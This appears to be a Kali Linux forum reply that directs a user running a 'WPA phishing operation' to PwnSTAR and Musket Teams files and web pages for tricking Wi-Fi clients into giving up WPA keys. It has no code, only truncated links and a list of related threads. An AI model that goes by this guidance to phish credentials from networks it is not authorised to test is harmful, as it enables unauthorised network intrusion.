    Okay you are trying to conduct a wpa phishing operation. The first working versions of this was developed by techdynamics but there were several operational obstacles that had to be worked out. Musket Teams have taken the work of techdynamics and developed a working system and then employed pwnstar9.0. Go to these links then down load the files and read thru the help files. The problems of phishing a WPA key from a client are outlined. Furthermore web pages have been developed specifically for WPA.

    https://forums.kali.org/showthread.p...light=phishing

    https://forums.kali.org/showthread.p...light=phishing

    MTB

Similar Threads

  1. PwnSTAR not recognising wlan
    By Matriculate in forum General Archive
    Replies: 0
    Last Post: 2016-04-20, 02:09
  2. Does Pwnstar work on Kali Linux 2.0?
    By jacke4123 in forum General Archive
    Replies: 1
    Last Post: 2015-10-27, 05:24
  3. PwnSTAR and Automatically open page on Fake-AP
    By markrenton in forum Project Archive
    Replies: 0
    Last Post: 2015-09-17, 10:52
  4. easy-creds vs pwnstar
    By boost in forum General Archive
    Replies: 6
    Last Post: 2014-04-21, 17:57
  5. Replies: 31
    Last Post: 2013-12-04, 13:57

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •